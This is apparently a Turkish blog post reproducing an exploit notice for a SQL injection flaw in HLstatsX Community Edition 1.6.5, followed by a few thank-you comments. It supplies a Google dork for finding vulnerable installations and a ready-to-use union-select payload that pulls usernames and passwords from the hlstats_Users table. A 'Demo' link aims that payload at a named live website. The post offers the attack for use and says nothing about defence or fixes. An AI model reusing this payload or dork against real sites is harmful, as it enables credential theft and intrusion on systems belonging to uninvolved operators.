HLstatsX Community Edition 1.6.5 SQL Injection Vulnerability


#############################################################
# HLstatsX Community Edition 1.6.5 SQL Injection Vulnerability

# Plugin Home: http://www.hlxcommunity.com/

# Author: BAYBORA

# Site: http://www.1923turk.com

##############################################################

Google Dork: “hlstats.php?mode=”

# Exploit: xxxxx.com/xxx/hlstats.php?mode=dailyawardinfo&award==[SQL-inj]

# -99+union+select+1,2,concat(username,0x3a,password)

,4+from+hlstats_Users–&game=css

# Demo: http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat(username,0x3a,password)

,4+from+hlstats_Users–&game=css

~~~~Yerinde sayanlar,Yürüyenlerden cok gürültü yaparlar!~~~~

##############################################################
# Greetz: Manas58 – Gamoscu – Delibey – Tiamo – Psiko – Turco – infazci – X-TRO
##############################################################

Reklamlar

2 responses to this post.

  1. Nice bro,,,,, thanks !! ^^

    Cevapla

  2. Posted by wolf-system on 23 Eylül 2010 at 15:35

    thanks ; )

    Cevapla

Bir Cevap Yazın

Aşağıya bilgilerinizi girin veya oturum açmak için bir simgeye tıklayın:

WordPress.com Logosu

WordPress.com hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Twitter resmi

Twitter hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Facebook fotoğrafı

Facebook hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Google+ fotoğrafı

Google+ hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Connecting to %s

%d blogcu bunu beğendi: